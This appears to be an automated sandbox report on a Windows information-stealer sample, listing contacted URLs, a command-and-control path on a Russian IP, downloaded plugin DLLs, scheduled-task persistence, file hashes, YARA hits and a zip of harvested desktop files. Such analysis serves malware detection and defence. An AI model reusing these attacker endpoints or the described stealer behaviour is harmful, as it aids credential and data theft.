                                http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://193.233.132.56/lexplorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    • URL Reputation: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://193.233.132.56/Pneh2sXQk0/index.phpkexplorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://193.233.132.56/Pneh2sXQk0/index.phpdexplorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://193.233.132.56/Pneh2sXQk0/index.phpgexplorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://contoso.com/Licensepowershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://193.233.132.56/ferences.SourceAumidexplorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllvexplorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://193.233.132.56/Pneh2sXQk0/index.phpdedexplorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://193.233.132.56/Pneh2sXQk0/index.php?wal=1srundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  http://193.233.132.56/Pneh2sXQk0/index.php3explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)Drundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://193.233.132.56/Pneh2sXQk0/index.php2explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    http://193.233.132.56/Pneh2sXQk0/index.php-rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://193.233.132.56/Pneh2sXQk0/index.php27explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://193.233.132.56/explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          http://193.233.132.56/CoreCommonProxyStub.dllexplorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://193.233.132.56/Pneh2sXQk0/index.php6explorha.exe, 00000006.00000002.3041565537.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            193.233.132.56
                                                            		unknownRussian Federation
                                                            		2895FREE-NET-ASFREEnetEUtrue

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1428513
                                                            Start date and time:2024-04-19 04:24:06 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 33s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@17/21@0/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            03:25:12Task SchedulerRun new task: explorha path: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                            04:26:02API Interceptor521176x Sleep call for process: explorha.exe modified
                                                            04:26:08API Interceptor18x Sleep call for process: powershell.exe modified
                                                            04:26:41API Interceptor129x Sleep call for process: rundll32.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            193.233.132.56SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            SecuriteInfo.com.Win32.PWSX-gen.580.27252.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php?wal=1
                                                            4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            SecuriteInfo.com.Win32.PWSX-gen.29653.14309.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            V28EuIqeda.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php
                                                            SecuriteInfo.com.Win32.PWSX-gen.14048.7584.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RisePro StealerBrowse
                                                            • 193.233.132.56/Pneh2sXQk0/index.php

                                                            Domains

                                                            No context

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            FREE-NET-ASFREEnetEUSecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                            • 193.233.132.167
                                                            SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                            • 193.233.132.226
                                                            UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                            • 193.233.132.167
                                                            tA6etkt3gb.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                            • 193.233.132.167
                                                            Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                            • 185.103.100.31
                                                            Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                            • 147.45.67.1
                                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 147.45.47.93
                                                            dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 147.45.47.93
                                                            SecuriteInfo.com.Win64.CrypterX-gen.2144.26023.exeGet hashmaliciousGlupteba, PureLog Stealer, zgRATBrowse
                                                            • 193.233.132.175
                                                            Q73YlTAmWe.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 147.45.47.93

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllSecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                              UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                tA6etkt3gb.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                  SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                    l2ZKczbGRq.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                      SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                        a5PfQvvi4y.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                          4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                            file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                              SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllSecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                  UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                    tA6etkt3gb.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                      SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                        l2ZKczbGRq.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                            a5PfQvvi4y.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                              4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exeGet hashmaliciousAmadey, RisePro StealerBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1285632
                                                                                                    Entropy (8bit):6.460494158653329
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                    MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                    SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                    SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                    SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Detection: malicious, Browse
                                                                                                    • Filename: UeW2b6mU6Z.exe, Detection: malicious, Browse
                                                                                                    • Filename: tA6etkt3gb.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, Detection: malicious, Browse
                                                                                                    • Filename: l2ZKczbGRq.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe, Detection: malicious, Browse
                                                                                                    • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                                    • Filename: 4fMLTRkOfB.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112128
                                                                                                    Entropy (8bit):6.400158525810517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                    MD5:726CD06231883A159EC1CE28DD538699
                                                                                                    SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                    SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                    SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                    • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, Detection: malicious, Browse
                                                                                                    • Filename: UeW2b6mU6Z.exe, Detection: malicious, Browse
                                                                                                    • Filename: tA6etkt3gb.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, Detection: malicious, Browse
                                                                                                    • Filename: l2ZKczbGRq.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exe, Detection: malicious, Browse
                                                                                                    • Filename: a5PfQvvi4y.exe, Detection: malicious, Browse
                                                                                                    • Filename: 4fMLTRkOfB.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Win32.PWSX-gen.29871.25289.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L...j..e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1504
                                                                                                    Entropy (8bit):5.274826074581965
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3xSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNEr8H0UMem:BSU4y4RQmFoUeCamfm9qr9tK8NfUNEIa
                                                                                                    MD5:2D9F053F15E277FBDF0DC512648E1C41
                                                                                                    SHA1:B4AFA34FA178947357BEAEC124CBB68DC6CD1B26
                                                                                                    SHA-256:9910FCD7442310F9B024BB282BF00D78E2DC6692001DB9A6F1A01BE15F7C9D29
                                                                                                    SHA-512:93451C6E917C8CF544CEE49854C0FB40BC24C8A8A50A897E2201E6755E584DE7CCDA8889347B95C573050F0D4ADD139716E905C9A52CDF51B4C04BE7EE89D6D0
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........4.....................&..............@..........@...............|.jdY\.H.s9.!..|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                    C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3010048
                                                                                                    Entropy (8bit):6.5934833981591465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:uSB7N+K2oIqvjWi3wkCL2SnvSiGQbiF31ZPGSus4Fmh:jB7N+K2oIqn3jCqGSHmiF31dGSJaC
                                                                                                    MD5:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    SHA1:C0B8D6E8B660AA79851BD237C162ED437D3C047C
                                                                                                    SHA-256:441ADF73DCC0324843D1E42824E7E9473960C859C748A87AC7AF4460535AAF2F
                                                                                                    SHA-512:DA0D387D54151A95993CF4F2AF96202D68403E09BD338A3182108EC3150FD06BD565A1BE1AF82481ACC6BDED5D8E4DF05E029EE89622E410E52E3CCF611C96D6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...o..e..............................1...... ....@...........................1.....-t....@.................................V...j............................w1..............................v1..................................................... . ............................@....rsrc...............................@....idata ............................@...qatcqnjl..*.......*.................@...zabsvnpb......1.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:false
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6140
                                                                                                    Entropy (8bit):7.780543792138917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:WbXU2qLn/TPqH/TPqQurqx7FTKnE+rs43XlTKnE+rs43M1n0R6wEZJYM3XKoQ:uU247aDbFTyE+rs431TyE+rs43QKEX5M
                                                                                                    MD5:68E20C18949CA8D299AF0CA351547899
                                                                                                    SHA1:5D23C732A302C978F253ADD8CB0C31326CC17C9E
                                                                                                    SHA-256:14F2AE838B604855BD677590CB5EF9788DFE2FD22EB2F3500AA22DD5390F3A01
                                                                                                    SHA-512:4017479F312E4E0817C9C4ACD2FB9796A9E799E076F003FDEF9729EE34CADE46D7A21266E762967E709532C6D9B183B8865D2EB47DFC255D4B7E272F05C18731
                                                                                                    Malicious:true
                                                                                                    Preview:PK........VpDW%..............._Files_\CURQNKVOIX.xlsx...E!........+..b...M.sh..z+is.^.6.m..]...>..ew....+.........|T^;)x:.0n.b...jB>......:..)P[H...u..a.........w...)]..i...K.I.4U..Z+.......O.5./..e.v.o).{....K...g._5~.Y.B....N.z....T.I>.[...U$.k..S.XuVNo..`.p..H.$.e..=..:..}.e.'y.7....Z4P*}$.Z...Z.t}..*-$v~...J..^38.\...u.Yx.#.`4.$.X......L|..|.4..]......{..G....[uA....w.H/..9l.~..[...........QU...ru....W.r}.P...pb...Z.[n4.Zjdj.~Qq....[I...d......|...........eU...=OL...8..:.b_...f..]..C.]....LCR".e.....&....g.\..3....E.....PFu.f.......sm?.Y..DO...>.u.Gs|.Cx...q.8....m...xrO..62.......k^}5..o.Eq.!....2...8...H...{K.....'.r.c..v$.A..eM..b.../.\.z&.K.{i...PK........VpDW*h.o............_Files_\JSDNGYCOWY.docx..I.@!.......PT.g..........;&{!...m,8jm..h.*.zM.m....\\..0......i{M.....4...sy.tk....".D.b.#g@{....F.v?..)..s..1..d/.yI /:.....w.CF.4....n..'HN... .......9..NI{~.U3(...sb...?..r....W\.V.7[.\X~.+h.../...%.........s...&NNK.q;P...~..o..%[.&.q..0

                                                                                                    C:\Users\user\AppData\Local\Temp\_Files_\CURQNKVOIX.xlsx

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\rundll32.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.688505748329201
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                    MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                    SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                    SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                    SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                    Malicious:false
